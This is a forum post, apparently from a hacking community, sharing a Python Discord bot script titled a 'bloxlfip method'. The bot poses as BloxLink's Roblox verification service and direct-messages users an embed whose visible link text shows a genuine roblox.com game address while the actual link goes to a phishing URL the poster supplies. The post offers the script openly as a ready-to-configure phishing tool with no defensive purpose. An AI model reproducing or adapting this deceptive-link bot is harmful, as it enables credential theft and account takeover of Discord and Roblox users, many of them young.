bloxlfip method

Currently reading:
 bloxlfip method

christayk

Member
LV
0
Joined
Sep 5, 2023
Threads
2
Likes
0
Credits
240©
Cash
0$
import discord
from discord.ext import commands


################### change these to your liking ###################

token = "BOT TOKEN HERE"
prefix = "!"
title = "Please Complete Verification"
desc ="To verify your account, please join BloxLink's Official Roblox Verification Game"
field = "Please Login and join the game"
hyperlink = "https://roblox.com/games/429530"
phish = "PHISHING LINK HERE"

###################################################################



client = commands.Bot(command_prefix = prefix)
client.remove_command('help')

@client.event
async def on_ready():
print('')
print('----------------')
print('Selfbot Online!')
print('----------------')

main = discord.Embed(title=title,description=desc,color=0xcf4948)
main.add_field(name=field,value=f"[{hyperlink}]({phish})")


@client.command()
async def verify(ctx):
await ctx.send('Sent Verification Link! Please Check DMs')
await ctx.author.send(embed=main)





client.run(token)
 

Create an account or login to comment

You must be a member in order to leave a comment

Create account

Create an account on our community. It's easy!

Log in

Already have an account? Log in here.

Tips

Similar threads

Top Bottom